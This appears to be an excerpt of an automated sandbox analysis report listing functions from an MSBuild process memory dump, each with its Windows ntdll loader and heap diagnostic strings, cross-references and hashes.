LdrpInitializeExecutionOptions, xrefs: 0110317D
RaiseExceptionOnPossibleDeadlock, xrefs: 01102579
UnloadEventTraceDepth, xrefs: 011024C0
MaxDeadActivationContexts, xrefs: 01102D82
minkernel\ntdll\ldrinit.c, xrefs: 01103187
GlobalFlag, xrefs: 01102F3F, 01103059
MinimumStackCommitInBytes, xrefs: 01102BB0
ShutdownFlags, xrefs: 011024A1
UseImpersonatedDeviceMap, xrefs: 0110251C
Initializing the application verifier package failed with status 0x%08lx, xrefs: 01103176
ExecuteOptions, xrefs: 011025A0
FrontEndHeapDebugOptions, xrefs: 01102489

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
API String ID: 0-2160512332
Opcode ID: 17df6db8d0fe3216280e819ce5e96fc152c37532b864cb1495cae378475d0124
Instruction ID: c77e0dfccfafb32eb9b63c236c0e26d5960a31b87dd57a11026ca82eafeca47e
Opcode Fuzzy Hash: 17df6db8d0fe3216280e819ce5e96fc152c37532b864cb1495cae378475d0124
Instruction Fuzzy Hash: A5929371A047429FE72ADF14C884FABB7E8BB84754F04492DFA95D7290D7B0D844CB92

Function 011312ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON

Download Yara Rule

Strings

Heap block at %p has corrupted PreviousSize (%lx), xrefs: 0113176D
HEAP: , xrefs: 01131706, 01131756, 011317A8, 01131809, 0113184D, 01131895, 011318E6
Heap block at %p has incorrect segment offset (%x), xrefs: 0113181A
Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x), xrefs: 011318A5
HEAP[%wZ]: , xrefs: 011316CD, 011316F9, 01131749, 0113179B, 011317FC, 01131840, 011318D9
Heap entry %p has incorrect PreviousSize field (%04x instead of %04x), xrefs: 0113186B
Heap block at %p is not last block in segment (%p), xrefs: 011317B7
Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x), xrefs: 011318F8
Free Heap block %p modified at %p after it was freed, xrefs: 0113171B

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
API String ID: 0-3591852110
Opcode ID: 3b1c99970eccbd3e340412f90f35741df8a3a71f5776e86853c43934950aa364
Instruction ID: ca47a43c57d0e1f9fa254234c834312594b885e78495fbd3c3e5b94a96a60456
Opcode Fuzzy Hash: 3b1c99970eccbd3e340412f90f35741df8a3a71f5776e86853c43934950aa364
Instruction Fuzzy Hash: DA12DE30604642EFEB2ACF69C440BB6BBF1FF8A714F198459E4D68B685D734E881CB51

Function 0107D34C Relevance: 11.6, Strings: 9, Instructions: 312COMMON

Download Yara Rule

Strings

@, xrefs: 0107D663
MachinePreferredUILanguages, xrefs: 0107D685
@, xrefs: 0107D49D
PreferredUILanguagesPending, xrefs: 010DA8DE
\Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 0107D3B6
Control Panel\Desktop\MuiCached, xrefs: 0107D62B
Control Panel\Desktop, xrefs: 0107D45D
@, xrefs: 0107D3E9
PreferredUILanguages, xrefs: 0107D4B8, 0107D4C5

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
API String ID: 0-3532704233
Opcode ID: c7ae6feefe0ffb81d6ee0e3e5ad90c1ef2cdfef574cd041e60e79002ad660cc0
Instruction ID: 139e671b1fcb39c63a8208c36cbc07897b8779afa3cc7ea0d7b7b8e3ca863957
Opcode Fuzzy Hash: c7ae6feefe0ffb81d6ee0e3e5ad90c1ef2cdfef574cd041e60e79002ad660cc0
Instruction Fuzzy Hash: 42B1AC729083429FD761DF68C880AAFBBE8BF88754F05496EF9C9D7240D730D9448B96

Function 01119179 Relevance: 10.4, Strings: 8, Instructions: 401COMMON

Download Yara Rule

Strings

BaseNamedObjects, xrefs: 01119477, 0111947C
\BaseNamedObjects, xrefs: 0111949E
\AppContainerNamedObjects, xrefs: 011194AB, 011194B9
Global\Session\%ld%s, xrefs: 011194C5
%s\%u-%u-%u-%u, xrefs: 01119422
%s\%ld\%s, xrefs: 0111948D
\Sessions, xrefs: 01119488
AppContainerNamedObjects, xrefs: 0111946E, 011194D6

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
API String ID: 0-3063724069
Opcode ID: 3449ab32ad6ebdc53deacb4733a99e0c9a6fa16f8bc585d6fa25abae24be84eb
Instruction ID: 2654e376ef2847bf3725773346084e4a03390b5fb8999959d12221051cd300f4
Opcode Fuzzy Hash: 3449ab32ad6ebdc53deacb4733a99e0c9a6fa16f8bc585d6fa25abae24be84eb
Instruction Fuzzy Hash: 9BD1E5B280831AAFD725DB54C850BAFFBE8AF94B18F44493DFA9497150D770D904CBA2

Function 01130274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON

Download Yara Rule

Strings

About to reallocate block at %p to %Ix bytes, xrefs: 011303BA
HEAP: , xrefs: 011303A6, 011304B5, 011305DD, 01130682, 011306D9
About to rellocate block at %p to 0x%Ix bytes with tag %ws, xrefs: 011304D3
Just reallocated block at %p to 0x%Ix bytes with tag %ws, xrefs: 0113069F
RtlReAllocateHeap, xrefs: 011302BF, 01130362
HEAP[%wZ]: , xrefs: 01130399, 011304A8, 011305D0, 01130675, 011306CC
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 011306EA
Just reallocated block at %p to %Ix bytes, xrefs: 011305F1

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
API String ID: 0-1700792311
Opcode ID: 426673d73ff164796f010bbbf9cd45749e94c55794032508f11b24c8e2d93e65
Instruction ID: 494d5db2ffc24d4e2d7a81991c1df92dd9c0bb7714e893555f7f091897574f1f
Opcode Fuzzy Hash: 426673d73ff164796f010bbbf9cd45749e94c55794032508f11b24c8e2d93e65
Instruction Fuzzy Hash: 6ED1EF31A00686DFDB2ADF68C840AAEFBF1FF8A710F198059F4959B656C7349981CB14

Function 0107D08D Relevance: 10.2, Strings: 8, Instructions: 249COMMON

Download Yara Rule

Strings

Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 0107D146
@, xrefs: 0107D0FD
@, xrefs: 0107D2AF
\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 0107D2C3
\Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 0107D0CF
Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 0107D262
@, xrefs: 0107D313
Control Panel\Desktop\LanguageConfiguration, xrefs: 0107D196

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
API String ID: 0-1356375266
Opcode ID: 9bdd56a4011f399138fa0119dc5f27fddd45e28024f0d581cd184d9a1b4ec23c
Instruction ID: c634f93b3012dba8855e935baebdb94b57d613d98c873a1730546ead05ddea8c
Opcode Fuzzy Hash: 9bdd56a4011f399138fa0119dc5f27fddd45e28024f0d581cd184d9a1b4ec23c
Instruction Fuzzy Hash: 1CA158719083469FE761DF64C880B9FBBE8BF84725F00492EEAC896240E774D949CF56

Function 0107F172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 010DDF64, 010DE0A8, 010DE286, 010DE39E
(!TrailingUCR), xrefs: 010DE3A9
(LONG)FreeEntry->Size > 1, xrefs: 010DE291
HEAP[%wZ]: , xrefs: 010DDF57, 010DE09B, 010DE279, 010DE391
(UCRBlock != NULL), xrefs: 010DDF6F
((LONG)FreeEntry->Size > 1), xrefs: 010DE0B3

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
API String ID: 0-523794902
Opcode ID: 25d3b6432f8f124ce1c082b48f4da78d87ee24b7fbb29150498da008a53905f8
Instruction ID: 6b72d90c103e135ee82cc14297402e2dd4add947f65432e816a03c70243e4ca2
Opcode Fuzzy Hash: 25d3b6432f8f124ce1c082b48f4da78d87ee24b7fbb29150498da008a53905f8
Instruction Fuzzy Hash: B6420F31A04382DFD755DF28C884A6ABBE5FF88604F0849ADF5E58B351DB34D841CB56

Function 0109B1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrutil.c, xrefs: 010E840D, 010E84E1
DLL %wZ was redirected to %wZ by %s, xrefs: 010E83FC
LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx, xrefs: 010E84D0
API set, xrefs: 010E83F4, 010E83F9
LdrpPreprocessDllName, xrefs: 010E8403, 010E84D7
SxS, xrefs: 010E83ED

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
API String ID: 0-122214566
Opcode ID: 28664305b8bce75dc2bb4f46f879fcefd108074ac1608f4a657d18d3765129df
Instruction ID: 3e3708e1cab109de6710e8b1997f50b5eeefe69135fc222f03079482926fdc66
Opcode Fuzzy Hash: 28664305b8bce75dc2bb4f46f879fcefd108074ac1608f4a657d18d3765129df
Instruction Fuzzy Hash: 72C14A71A00215ABDF25CF69D8A4FBEBBE5EF45720F04C0A9EDC19B291DB708844E391

Function 010B63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON

Download Yara Rule

Strings

NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop, xrefs: 010F41FE
LDR:MRDATA: Process initialization failed with status 0x%08lx, xrefs: 010F40D8
Delaying execution failed with status 0x%08lx, xrefs: 010F4258
_LdrpInitialize, xrefs: 010F40DF, 010F4141, 010F4205, 010F425F
minkernel\ntdll\ldrinit.c, xrefs: 010F40E9, 010F414B, 010F420F, 010F4269
Process initialization failed with status 0x%08lx, xrefs: 010F413A

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
API String ID: 0-792281065
Opcode ID: 18c8afd99b66da78cf2f6ae515f63706ff27f782dbb93bec4c67e1d16df85dcf
Instruction ID: feb53cec4fa3473b9beca9dadda0cf3fdb00662887f157bc39afcd49c63d61ef
Opcode Fuzzy Hash: 18c8afd99b66da78cf2f6ae515f63706ff27f782dbb93bec4c67e1d16df85dcf
Instruction Fuzzy Hash: 77912830A017159BEB69DF18D885BEE7BB5BF40B14F04017CEA90AB781DB799841CB91

Function 0112F525 Relevance: 7.7, Strings: 6, Instructions: 231COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 0112F6F4, 0112F7A1, 0112F7F8
Just allocated block at %p for 0x%Ix bytes with tag %ws, xrefs: 0112F7BE
RtlAllocateHeap, xrefs: 0112F56D
HEAP[%wZ]: , xrefs: 0112F6E7, 0112F794, 0112F7EB
Just allocated block at %p for %Ix bytes, xrefs: 0112F708
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 0112F809

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
API String ID: 0-1745908468
Opcode ID: 8dc7022edcd4a23d37ad02c0da3d284fe3302bb9e4b1564adae6c0e6368bb2e8
Instruction ID: 0954fb57674ad1cc531f63fe4308ca19e424f0d7f276b08dd87d067e14ee7a2a
Opcode Fuzzy Hash: 8dc7022edcd4a23d37ad02c0da3d284fe3302bb9e4b1564adae6c0e6368bb2e8
Instruction Fuzzy Hash: 44912131A00662DFDB2ADFA8D440AADFBF2FF19704F15801DE495AB361CB759852CB14

Function 0107645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON

Download Yara Rule

Strings

Getting the shim engine exports failed with status 0x%08lx, xrefs: 010D9A01
apphelp.dll, xrefs: 01076496
Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 010D99ED
LdrpInitShimEngine, xrefs: 010D99F4, 010D9A07, 010D9A30
Loading the shim engine DLL failed with status 0x%08lx, xrefs: 010D9A2A
minkernel\ntdll\ldrinit.c, xrefs: 010D9A11, 010D9A3A

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-204845295
Opcode ID: bc0f8a5f6a5a2705aa404860e0543fce389e266fccfcada958f4cc3ab55a665e
Instruction ID: 23270b7a567e93ae0e984c4b7beaff2064026ab67ca7a64a1550692b627b8d19
Opcode Fuzzy Hash: bc0f8a5f6a5a2705aa404860e0543fce389e266fccfcada958f4cc3ab55a665e
Instruction Fuzzy Hash: FD51C0716187059FE724DF28C881AABB7E8FB84748F00092DF5D69B260D731E944DB97

Function 010AF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 010F02BD
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 010F02E7
RTL: Re-Waiting, xrefs: 010F031E

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: 43d919c549a71b25129a90c407b0240854fead309e5d47d116462c5c4346a12d
Instruction ID: dca3e31ebd55f8a39e541d04e3598202a79e495d0c1237423bda084d407f6697
Opcode Fuzzy Hash: 43d919c549a71b25129a90c407b0240854fead309e5d47d116462c5c4346a12d
Instruction Fuzzy Hash: 22E1FF306087429FE765CF68C881B6EBBE1BB88314F144A6DF6E58B6D2D774D844CB42

Function 010A51EF Relevance: 6.7, Strings: 5, Instructions: 434COMMON

Download Yara Rule

Strings

Kernel-MUI-Language-Disallowed, xrefs: 010A5352
WindowsExcludedProcs, xrefs: 010A522A
Kernel-MUI-Language-Allowed, xrefs: 010A527B
Kernel-MUI-Language-SKU, xrefs: 010A542B
Kernel-MUI-Number-Allowed, xrefs: 010A5247

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: b473890219a25717a8d75a816af651b33c06cfe446371ceb47ff54761adfadac
Instruction ID: e30ac4006a5c523141694620d0257106e9dbc6591d3257529e3a8fc237411175
Opcode Fuzzy Hash: b473890219a25717a8d75a816af651b33c06cfe446371ceb47ff54761adfadac
Instruction Fuzzy Hash: AEF14A72D00619EFCB11DFA9C984AEEBBF9FF48610F50406AE585EB210E7709E008B90

Function 010970C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 01097C7C, 0109867F
HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 01097C96, 01098696
HEAP[%wZ]: , xrefs: 01097C6D, 01098670

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: 3d2a202ba40022fe0c05d0aed0f09d32a13bc0af26e8c131e3d98b2e91e431a7
Instruction ID: 7c53453c9c74e201c919571df1e8f1d36bf9d3b6f2db3fc296596584de188815
Opcode Fuzzy Hash: 3d2a202ba40022fe0c05d0aed0f09d32a13bc0af26e8c131e3d98b2e91e431a7
Instruction Fuzzy Hash: 0513BF71A00259CFDF69CF68C4A07ADBBF1BF49304F1481AAD999AB381D734A845DF90

Function 01091070 Relevance: 5.9, Strings: 4, Instructions: 940COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 010E5884
@, xrefs: 010E5A53
HEAP[%wZ]: , xrefs: 010E5877
!(CheckedFlags & ~HEAP_CREATE_VALID_MASK), xrefs: 010E588F

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
API String ID: 0-3570731704
Opcode ID: 3ab244d4f1554851b3829d1b8697ddd4863c45d54de76b96b95a6fb2d105647e
Instruction ID: 32632fc6a580eeac5d51aec1677335eb3501bbc51630a687a4996b99de8549a9
Opcode Fuzzy Hash: 3ab244d4f1554851b3829d1b8697ddd4863c45d54de76b96b95a6fb2d105647e
Instruction Fuzzy Hash: D7926975A0122ACFEF65CB19CC54BA9B7F1BF45324F0581EAD989AB281D7309E80CF51

Function 01081460 Relevance: 5.4, Strings: 4, Instructions: 385COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 01081596
HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 01081728
HEAP[%wZ]: , xrefs: 01081712
, xrefs: 010816A3

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID: $HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-2084224854
Opcode ID: e454d1c153a1b8a8a379696f4add6bd1d9f5912895ce26c951284d4e95b87974
Instruction ID: ece3be167a32f3667d95c6df073a8d0c90a33b787c4ffebaee8881a3ecb0972a
Opcode Fuzzy Hash: e454d1c153a1b8a8a379696f4add6bd1d9f5912895ce26c951284d4e95b87974
Instruction Fuzzy Hash: F6E1DE30A086469FDB29DF6CC451ABABBF1BF48304F18849DE9D6CB246D734E942CB50

Function 0108A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON

Download Yara Rule

Strings

LdrResFallbackLangList Exit, xrefs: 0108A3FF
LdrResFallbackLangList Enter, xrefs: 0108A3EF
8, xrefs: 0108A3E7
6, xrefs: 0108A3F7

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
API String ID: 0-379654539
Opcode ID: 1a912aa666d695dbbef3d5b9025027ef24edd83f5996f97e2c45de1979c26242
Instruction ID: 9c4ba23efa58783345d96fea5747c7d8285d7fd0b62eb01fe1b139ab15d6f5c0
Opcode Fuzzy Hash: 1a912aa666d695dbbef3d5b9025027ef24edd83f5996f97e2c45de1979c26242
Instruction Fuzzy Hash: 90C18B7460C386CFDB11EF59C044B6AB7E4BF88704F04496AF9D58BA51E738CA49CB62

Function 010B8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON

Download Yara Rule

Strings

@, xrefs: 010B8591
LdrpInitializeProcess, xrefs: 010B8422
\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 010B855E
minkernel\ntdll\ldrinit.c, xrefs: 010B8421

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
API String ID: 0-1918872054
Opcode ID: cd87ed1e63f2161a55cee5f7ceb1aac5860d9402c03802424635796762a2791e
Instruction ID: 0e1f4432399fd8543f0e8134e25d0c5234c34b6bae10d295d7fa74ed5bc16e5a
Opcode Fuzzy Hash: cd87ed1e63f2161a55cee5f7ceb1aac5860d9402c03802424635796762a2791e
Instruction Fuzzy Hash: 04918871508345AFD761EB25CC81FAFBAECBB88744F40492EFAC496161E734D9448B62

Function 010A15F4 Relevance: 5.2, Strings: 4, Instructions: 166COMMON

Download Yara Rule

Strings

LdrpCompleteMapModule, xrefs: 010EA590
Could not validate the crypto signature for DLL %wZ, xrefs: 010EA589
minkernel\ntdll\ldrmap.c, xrefs: 010EA59A
MZER, xrefs: 010A16E8

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$MZER$minkernel\ntdll\ldrmap.c
API String ID: 0-1409021520
Opcode ID: f093432e1a3c7f287195a6d8d60e136083c553af396d4cbd9179f5db31886aec
Instruction ID: fe731de47371b9d7d506102539b78d18d5084820449ef52cd90ff98768eb1d5d
Opcode Fuzzy Hash: f093432e1a3c7f287195a6d8d60e136083c553af396d4cbd9179f5db31886aec
Instruction Fuzzy Hash: 16510331700741DFEB22DEADC948B6A7BE9BB08764F5801A4EAD1DB6D2C774E840CB40

Function 011311A4 Relevance: 5.1, Strings: 4, Instructions: 113COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 0113124A, 0113125D, 0113125F, 011312C4
This is located in the %s field of the heap header., xrefs: 011312D6
Heap %p - headers modified (%p is %lx instead of %lx), xrefs: 01131261
HEAP[%wZ]: , xrefs: 0113123D, 011312B7

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
API String ID: 0-336120773
Opcode ID: 57db7dd82ca5599060c045b2fd6696a6ff4ab567e0af01a21fa3910263f55738
Instruction ID: 5e5cf29aac124d3d72c76ea1cb2ebb25814b5d5c5e9495ac097f234ea121dd6a
Opcode Fuzzy Hash: 57db7dd82ca5599060c045b2fd6696a6ff4ab567e0af01a21fa3910263f55738
Instruction Fuzzy Hash: 83314471210200FFD718DB98CC85FABBBE8EF45664F250059F895CB294EB31AC40CBA9

Function 010A245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON

Download Yara Rule

Strings

LdrpDynamicShimModule, xrefs: 010EA998
Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 010EA992
apphelp.dll, xrefs: 010A2462
minkernel\ntdll\ldrinit.c, xrefs: 010EA9A2

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-176724104
Opcode ID: 12af27a649529653b3a8eb47df40827dde2e2e14e52651114aaa274e6a13c36f
Instruction ID: 5d5e77afc3d5dcc0cd6da5f23007c19374eb795a701f4ee1f1ccfc45b20f4c7f
Opcode Fuzzy Hash: 12af27a649529653b3a8eb47df40827dde2e2e14e52651114aaa274e6a13c36f
Instruction Fuzzy Hash: EB312A75B10301EFDB399F9AD845AAEB7F5FB88714F160069E9A1AB345C7705881CB80

Function 01079148 Relevance: 5.1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 010DBAAD, 010DBAEA
VirtualProtect Failed 0x%p %x, xrefs: 010DBABA
HEAP[%wZ]: , xrefs: 010DBAA0, 010DBADD
VirtualQuery Failed 0x%p %x, xrefs: 010DBAF7

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
API String ID: 0-1391187441
Opcode ID: 7802a2c84e84d583802649aacf3d5b7c0f171fc65162e3836ba45273a809e11d
Instruction ID: d2242475b62ca09c9964263feac657a3a672b83eebc3fa04dd1d0f424e15db9b
Opcode Fuzzy Hash: 7802a2c84e84d583802649aacf3d5b7c0f171fc65162e3836ba45273a809e11d
Instruction Fuzzy Hash: 8A31A332A00205EFCB41DB59CC84FEEBBF8EF46A74F154059F994AB291DB70E940CA65

Function 0107A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON

Download Yara Rule

Strings

FilterFullPath, xrefs: 010DC2E6
\??\, xrefs: 010DC1E4
